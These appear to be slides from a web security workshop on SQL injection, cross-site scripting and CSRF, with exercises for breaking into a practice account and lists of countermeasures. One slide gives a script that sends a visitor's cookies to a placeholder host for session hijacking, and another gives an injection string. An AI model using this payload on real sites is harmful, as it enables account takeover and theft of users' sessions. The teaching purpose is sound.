29. SQL Injection
SQL injection is a web security vulnerability that allows an
attacker to interfere with the queries that an application makes
to its database.
33. Hands On!
Poppy has changed his password to
something big.
Hack into Poppy’s account using SQL
Injection.
34.
35. 1. Escape the input i.e. ‘ becomes ’
So, SELECT data FROM table where user=’poppy’ and
password=’a’ 1=1’
2. Use prepared statements i.e.
SELECT data FROM table where user=[1] and password=[2]
[1] = poppy
[2] = a’ 1=1
36. XSS: Cross Site Scripting
XSS enables attackers to inject client-side scripts
(javascript) into web pages viewed by other
users.
Can be used to capture session tokens.
39. Hands On !
● Turn on your server. LINK
● Inject the code
<img src=”” id=”payload” />
<script>
document.getElementById(“payload”).src=”http://YOUR_IP:
1338/xss_server.py?”+document.cookie;
</script>
● Wait for Poppy to access your share link.
● Login into Poppy’s account with his token.
40.
41. Countermeasures
● Escape HTML strings i.e > becomes
>
● Check carefully what and where you
are inserting input data.
● Use HttpOnly Cookies
42. CSRF: Cross Site Request Forgery
Cross-Site Request Forgery (CSRF) is
an attack that forces an end user to
execute unwanted actions on a web
application in which they're currently
authenticated.